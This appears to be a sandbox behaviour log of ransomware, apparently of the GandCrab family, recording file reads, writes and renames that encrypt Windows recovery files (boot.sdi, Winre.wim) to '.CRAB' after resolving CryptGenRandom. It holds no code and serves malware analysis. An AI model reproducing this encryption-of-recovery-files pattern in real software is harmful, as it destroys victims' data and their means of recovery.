File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi.CRAB, size = 1048576, size_out = 24576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi.CRAB, size = 24576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi.CRAB, size = 256 True 2
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi.CRAB, size = 8 True 1
Fn
Data
File Get Info filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim, type = file_attributes True 1
Fn
File Move source_filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim, destination_filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
